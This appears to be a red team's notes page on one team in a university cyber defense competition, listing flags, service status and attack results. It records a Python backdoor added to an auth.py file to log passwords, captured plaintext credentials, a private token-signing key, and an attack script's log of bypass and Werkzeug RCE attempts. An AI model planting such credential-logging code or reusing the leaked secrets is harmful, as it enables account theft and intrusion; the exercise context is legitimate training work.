Team Information
- Number
- Team 4
- Name
- Kikirikat
- IP Range
- 200.2.96.0/24
- Domain
- team4.isucdc.com
- Current Place
- 23rd
- Red Teamer(s)
- None
Flag Status
| Blue Flags |
|---|
| AD C:\Windows\System32\ TICKETS C:\Windows\System32\ MGMT /etc/ ADMIN C:\Windows\System32\ WWW /etc/ TICKETS Forged ticket MGMT DB Read MGMT Bus service MGMT Train service |
| Red Flags |
|---|
| AD C:\Users\Administrator\ TICKETS C:\Users\Administrator\ MGMT /root/ ADMIN C:\Users\Administrator\ WWW /root/ |
Service Status
| AD LDAP |
| AD RDP |
| AD LDAPS |
| TICKETS HTTP |
| TICKETS RDP |
| MGMT HTTP |
| MGMT SSH |
| ADMIN HTTP |
| ADMIN RDP |
| WWW HTTP |
| WWW SSH |
| ADMIN Login |
| WWW Login |
Nmap
Add content here...
Notable Vulnerabilities
Used the console, to add
```
with open('/tmp/log.file', 'a') as f:
f.write(f'{username}: {password}')
f.write(f'{username}: {password}')
```
to the auth.py file to write out logs of passwords.
edward.matthews: war573pir
Notable Defenses
OK team=4 host=mgmt.team4.isucdc.com user=michael.miranda password=erikaa reason=ok
OK team=4 host=mgmt.team4.isucdc.com user=krystal.gray password=oggies reason=ok
OK team=4 host=mgmt.team4.isucdc.com user=leslie.brady password=juicec2245 reason=ok
OK team=4 host=mgmt.team4.isucdc.com user=krystal.gray password=oggies reason=ok
OK team=4 host=mgmt.team4.isucdc.com user=leslie.brady password=juicec2245 reason=ok
Private signing key for tokens:
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
TEAM 04
────────────────────────────────────────────────────────────[Team 04] MGMT backend online (HTTP 500)
[Team 04] Ticket forge: no flag (patched)
[Team 04] DB flag: not accessible
[Team 04] Auth bypass: all users rejected (LDAP patched)
[Team 04] Vehicle flag (bus): not available yet
[Team 04] Vehicle flag (train): not available yet
[Team 04] Admin UI online
[Team 04] Code-server: not accessible (patched or blocked)
[Team 04] Attempting Werkzeug persistence on MGMT...
[Team 04] Werkzeug RCE not available (patched)
Team Spirit Issues
Add content here...